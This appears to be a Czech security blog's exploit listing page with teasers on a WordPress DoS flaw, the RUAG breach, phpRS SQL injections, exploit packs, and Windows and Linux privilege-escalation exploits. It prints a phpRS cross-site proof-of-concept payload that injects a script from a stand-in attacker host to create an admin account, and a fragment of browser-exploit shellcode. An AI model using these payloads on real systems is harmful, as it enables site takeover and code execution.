Exploit

Zdrojové kódy zajímavých exploitů

WordPress obsahuje závažnou chybu umožňující DoS

Před pár dny se objevila advisorka popisující závažnou bezpečnostní chybu v CMS WordPress umožňující utoč DoS útok na server a jeho následné vytížení a nedostupnost.

Zdroj:

Hackování RUAG. Švýcarský CERT odhalil podrobnosti o útoku

V květnu se veřejnost dozvěděla o kyberbezpečnostním útoku na hlavního švýcarského vojenského dodavatele. RUAG popíral zprvu všechna obvinění z úniku citlivých dat. Dnes švýcarský CERT zveřejnil podrobnou zprávu o útoku, vysvětluje, jak se to stalo a kdy.

Tato zpráva je k dispozici zde, kde si ji může každý stáhnout a přečíst.

TOR Index

Využil jsem služby SP pastebin k publikaci zdrojových kódů několika experimentálních nástrojů pro všechny případné zájemce o prostudování a v několika dalších příspěvcích bych k nim chtěl poskytnout více informací.

Zde jsou zatím odkazy
Enjoy :)

TOR Crypto Dialog

phpRS 2.8.2 RC v5 Multiple SQL injections

V poslední verzi českého redakčního systému phpRS se nachází několik SQL injekcí.

Seznamte se - exploitpack

"Webové stránky významné společnosti XYZ servírovaly návštěvníkům java exploity z nechvalně známého exploitpacku Blackhole". Přesně takové zprávy zdobí prakticky denně titulní stránky zpravodajských serverů zaměřených na bezpečnost. Co to ale exploitpack přesně je? A kde se vzal? Přesně tuto otázku má za úkol zodpovědět následující článek.

phpRS 2.8.1a XSRF POC EXPLOIT

PHPRS 2.8.1A XSRF POC EXPLOIT
VULN: REGISTRATION (readers.php), INPUTS ‘rcelejmeno’ && ‘rmail’
VALUE: “-</td><script src=http://ev.il/xpl.js />”
AUTHOR: 4194
EXPLOIT_DESCRIPTION: creating new admin account

Exploit použitý k útoku na korporátní síť Googlu

UPDATE

<html><script>
var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805

Chyba zneužitelná od Windows NT 3.1 až po Windows 7 (Ring 0 Escalation Vulnerability)

Na Internetu se objevil exploit umožňující eskalaci oprávnění díky kódu, který je ve Windows od roku 1993.

Twitter pod útokem iránských hackerů

... na Twitter byly během včerejšího dne vedeny hackerské útoky, ke kterým se přihlásila skupina „Iranian Cyber Army“ (Íránská kyberarmáda).

Linux Kernel 2.x sock_sendpage()

A máme tu další lokální exploit pro Linux.

Syndikovat obsah